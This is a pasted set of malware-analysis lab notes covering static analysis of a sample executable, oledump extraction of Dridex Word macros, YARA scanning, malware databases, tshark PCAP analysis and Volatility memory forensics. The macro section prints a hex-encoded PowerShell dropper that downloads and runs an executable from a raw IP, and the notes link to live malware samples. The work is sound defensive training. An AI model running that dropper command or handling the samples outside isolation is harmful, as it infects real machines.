Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################
- # Download the Analysis VM #
- ############################
- https://infosecaddictsfiles.blob.core.windows.net/vms/InfoSecAddictsVM.zip
- user: infosecaddicts
- pass: infosecaddicts
- - Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
- - After logging please open a terminal window and type the following commands:
- cd Desktop/
- - This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
- cd /home/infosecaddicts/Desktop/
- wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip --no-check-certificate
- wget https://infosecaddictsfiles.blob.core.windows.net/files/analyse_malware.py --no-check-certificate
- unzip malware-password-is-infected.zip
- infected
- file malware.exe
- mv malware.exe malware.pdf
- file malware.pdf
- mv malware.pdf malware.exe
- hexdump -n 2 -C malware.exe
- ***What is '4d 5a' or 'MZ'***
- Reference:
- http://www.garykessler.net/library/file_sigs.html
- objdump -x malware.exe
- strings malware.exe
- strings --all malware.exe | head -n 6
- strings malware.exe | grep -i dll
- strings malware.exe | grep -i library
- strings malware.exe | grep -i reg
- strings malware.exe | grep -i hkey
- strings malware.exe | grep -i hku
- - We didn't see anything like HKLM, HKCU or other registry type stuff
- strings malware.exe | grep -i irc
- strings malware.exe | grep -i join
- strings malware.exe | grep -i admin
- strings malware.exe | grep -i list
- - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
- sudo apt-get install -y python-pefile
- malware
- vi analyse_malware.py
- python analyse_malware.py malware.exe
- Building a Malware Scanner
- --------------------------
- mkdir ~/Desktop/malwarescanner
- cd ~/Desktop/malwarescanner
- wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
- unzip master.zip
- cd malwarescanner-master/
- python scanner.py -h
- cat strings.txt
- cat hashes.txt
- mkdir ~/Desktop/malcode
- cp ~/Desktop/malware.exe ~/Desktop/malcode
- python scanner.py -H hashes.txt -D /home/infosecaddicts/Desktop/malcode/ strings.txt
- cd ~/Desktop/
- #####################################################
- # Analyzing Macro Embedded Malware #
- # Reference: #
- # https://jon.glass/analyzes-dridex-malware-p1/ #
- #####################################################
- cp ~/Desktop/
- - Create a FREE account on:
- https://malwr.com/account/signup/
- - Grab the malware from:
- https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/
- file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
- cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin
- sudo pip install olefile
- malware
- mkdir ~/Desktop/oledump
- cd ~/Desktop/oledump
- wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
- unzip oledump_V0_0_22.zip
- cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .
- mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc
- -----------------------------------------------------------------------------------------------------------------------------------
- sudo pip install olefile
- malware
- mkdir ~/Desktop/oledump
- cd ~/Desktop/oledump
- wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/064016.zip
- unzip 064016.zip
- infected
- python oledump.py 064016.doc
- python oledump.py 064016.doc -s A4 -v
- - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
- python oledump.py 064016.doc -s A5 -v
- - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
- python oledump.py 064016.doc -s A3 -v
- - Look for "GVhkjbjv" and you should see:
- 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
- - Take that long blob that starts with 636D and finishes with 653B and paste it in:
- http://www.rapidtables.com/convert/number/hex-to-ascii.htm
- ##############
- # Yara Ninja #
- ##############
- sudo apt-get remove -y yara
- malware
- wget https://github.com/plusvic/yara/archive/v3.4.0.zip
- sudo apt-get -y install libtool
- malware
- unzip v3.4.0.zip
- cd yara-3.4.0
- ./bootstrap.sh
- ./configure
- make
- sudo make install
- malware
- yara -v
- cd ..
- wget https://github.com/Yara-Rules/rules/archive/master.zip
- unzip master.zip
- cd ~/Desktop
- yara rules-master/packer.yar malcode/malware.exe
- Places to get more Yara rules:
- ------------------------------
- https://malwareconfig.com/static/yaraRules/
- https://github.com/kevthehermit/YaraRules
- https://github.com/VectraThreatLab/reyara
- Yara rule sorting script:
- -------------------------
- https://github.com/mkayoh/yarasorter
- cd ~/Desktop/rules-master
- for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
- cd ~/Desktop/
- yara rules-master/master.yar malcode/malware.exe
- Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
- http://derekmorton.name/files/malware_12-14-12.sql.bz2
- Malware Repositories:
- http://malshare.com/index.php
- http://www.malwareblacklist.com/
- http://www.virusign.com/
- http://virusshare.com/
- http://www.tekdefense.com/downloads/malware-samples/
- ###############################
- # Creating a Malware Database #
- ###############################
- Creating a malware database (sqlite)
- ------------------------------------
- sudo apt-get install -y python-simplejson python-simplejson-dbg
- malware
- wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
- wget wget https://infosecaddictsfiles.blob.core.windows.net/files/malware-password-is-infected.zip
- unzip malware-password-is-infected.zip
- infected
- python avsubmit.py --init
- python avsubmit.py -f malware.exe -e
- Creating a malware database (mysql)
- -----------------------------------
- - Step 1: Installing MySQL database
- - Run the following command in the terminal:
- sudo apt-get install mysql-server
- malware
- - Step 2: Installing Python MySQLdb module
- - Run the following command in the terminal:
- sudo apt-get build-dep python-mysqldb
- malware
- sudo apt-get install python-mysqldb
- malware
- Step 3: Logging in
- Run the following command in the terminal:
- mysql -u root -p (set a password of 'malware')
- - Then create one database by running following command:
- create database malware;
- exit;
- wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
- vi mal_to_db.py (fill in database connection information)
- python mal_to_db.py -i
- ------- check it to see if the files table was created ------
- mysql -u root -p
- malware
- show databases;
- use malware;
- show tables;
- describe files;
- exit;
- ---------------------------------
- - Now add the malicious file to the DB
- python mal_to_db.py -f malware.exe -u
- - Now check to see if it is in the DB
- mysql -u root -p
- malware
- mysql> use malware;
- select id,md5,sha1,sha256,time FROM files;
- mysql> quit;
- #################
- # PCAP Analysis #
- #################
- cd /home/infosecaddicts/Desktop/Browser\ Forensics
- ls | grep pcap
- perl chaosreader.pl suspicious-time.pcap
- firefox index.html
- cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
- cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
- sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
- malware
- for i in session_00[0-9]*.www.html; do srcip=`cat "$i" | grep 'www:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'www:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
- #############################
- # PCAP Analysis with tshark #
- #############################
- tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
- tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
- tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
- tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
- tshark -r suspicious-time.pcap -R "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
- tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
- tshark -r suspicious-time.pcap -qz ip_hosts,tree
- tshark -r suspicious-time.pcap -R "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
- tshark -r suspicious-time.pcap -R "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
- whois rapidshare.com.eyu32.ru
- whois sploitme.com.cn
- tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
- tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
- tshark -r suspicious-time.pcap -qz http_req,tree
- tshark -r suspicious-time.pcap -R "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
- tshark -r suspicious-time.pcap -R http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
- ######################################
- # PCAP Analysis with forensicPCAP.py #
- ######################################
- cd ~/Desktop
- wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
- sudo easy_install cmd2
- malware
- python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
- ForPCAP >>> help
- Prints stats about PCAP
- ForPCAP >>> stat
- Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
- ForPCAP >>> dns
- ForPCAP >>> show
- Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
- ForPCAP >>> dstports
- ForPCAP >>> show
- Prints the number of ip source and store them.
- ForPCAP >>> ipsrc
- ForPCAP >>> show
- Prints the number of web's requests and store them
- ForPCAP >>> web
- ForPCAP >>> show
- Prints the number of mail's requests and store them
- ForPCAP >>> mail
- ForPCAP >>> show
- ###################
- # Memory Analysis #
- ###################
- cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility
- python volatility
- python volatility pslist -f ../hn_forensics.vmem
- python volatility connscan2 -f ../hn_forensics.vmem
- python volatility memdmp -p 888 -f ../hn_forensics.vmem
- python volatility memdmp -p 1752 -f ../hn_forensics.vmem
- ***Takes a few min***
- strings 1752.dmp | grep "^http://" | sort | uniq
- strings 1752.dmp | grep "Ahttps://" | uniq -u
- cd ..
- foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
- cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
- cat audit.txt
- cd pdf
- ls
- grep -i javascript *.pdf
- cd /home/infosecaddicts/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
- wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
- unzip pdf-parser_V0_6_4.zip
- python pdf-parser.py -s javascript --raw 00600328.pdf
- python pdf-parser.py --object 11 00600328.pdf
- python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js
- cat malicious.js
- *****Sorry - no time to cover javascript de-obfuscation today*****
- cd /home/infosecaddicts/Desktop/Banking\ Troubles/Volatility/
- python volatility files -f ../hn_forensics.vmem > files
- cat files | less
- python volatility malfind -f ../hn_forensics.vmem -d out
- ls out/
- python volatility hivescan -f ../hn_forensics.vmem
- python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
- for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement